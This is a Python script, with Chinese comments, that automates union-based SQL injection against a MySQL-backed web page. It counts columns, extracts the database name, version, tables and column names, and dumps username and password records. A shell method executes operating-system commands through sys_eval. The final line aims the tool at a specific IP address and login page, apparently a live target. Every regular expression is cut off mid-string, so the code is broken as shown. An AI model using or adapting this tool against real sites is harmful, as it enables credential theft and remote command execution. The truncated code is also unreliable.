import urllib.request
import re
class MySQL():
def __init__(self,url=""):
self.url=url
self.dbname=""
self.tablelist=[]
#字段数
def columnCount(self):
page=urllib.request.urlopen(self.url).read()
i=1
while(True):
sql=urllib.request.urlopen(self.url+"%20order%20by%20"+str(i)).read()
if page!=sql:
break
i=i+1
return i-1
#填充字符
def filler(self):
temp=""
for i in range(0,self.columnCount()-1):
temp=temp+",1"
return temp
#当前使用的数据库
def dbName(self):
temp="%20and%201=2%20union%20select%20database()"+self.filler()
page=str(urllib.request.urlopen(self.url+temp).read())
datalist=re.findall(r'
self.dbname=datalist[3]
return datalist[3]
#当前数据库版本
def version(self):
temp="%20and%201=2%20union%20select%20version()"+self.filler()
page=str(urllib.request.urlopen(self.url+temp).read())
datalist=re.findall(r'
print(datalist[3])
#显示数据库下的所有表
def tables(self,db_name=""):
temp="%20and%201=2%20union%20select%20table_name"+self.filler()+"%20from%20information_schema.tables%20where%20table_schema='"+db_name+"'"
page=str(urllib.request.urlopen(self.url+temp).read())
datalist=re.findall(r'
templist=[]
for i in datalist[3::3]:
templist.append(i)
self.tablelist=templist
return templist
#显示数据表的字段test
def columnsName(self,tb_name):
temp="%20and%201=2%20union%20select%20column_name"+self.filler()+"%20from%20information_schema.columns%20where%20table_name='"+tb_name+"'"
page=str(urllib.request.urlopen(self.url+temp).read())
datalist=re.findall(r'
templist=[]
for i in datalist[3::3]:
templist.append(i)
return templist
#字段的属性
def columnsType(self,tb_name):
temp="%20and%201=2%20union%20select%20data_type"+self.filler()+"%20from%20information_schema.columns%20where%20table_name='"+tb_name+"'"
page=str(urllib.request.urlopen(self.url+temp).read())
datalist=re.findall(r'
templist=[]
for i in datalist[3::3]:
templist.append(i)
return templist
#数据表下的记录
def columnsContent(self,tb_name):
temp="%20and%201=2%20union%20select%20id,username,password%20from%20"+self.dbname+"."+tb_name+""
page=str(urllib.request.urlopen(self.url+temp).read())
l=re.findall(r'
templist=[l[i:i + 3] for i in range(0, len(l), 3)]
return templist
#执行sehll
def shell(self):
cmd=input("输入命令:")
l=cmd.split(" ")
cmd=""
for i in l:
cmd=cmd+str(i)+"%20"
temp="%20and%201=2%20union%20select%20sys_eval(%27"+cmd+"%27)"+self.filler()
page=str(urllib.request.urlopen(self.url+temp).read())
l=re.findall(r'
templist=[l[i:i + 3] for i in range(0, len(l), 3)]
return templist
test=MySQL("http://62.234.74.205/Login/Detail.php?id=1")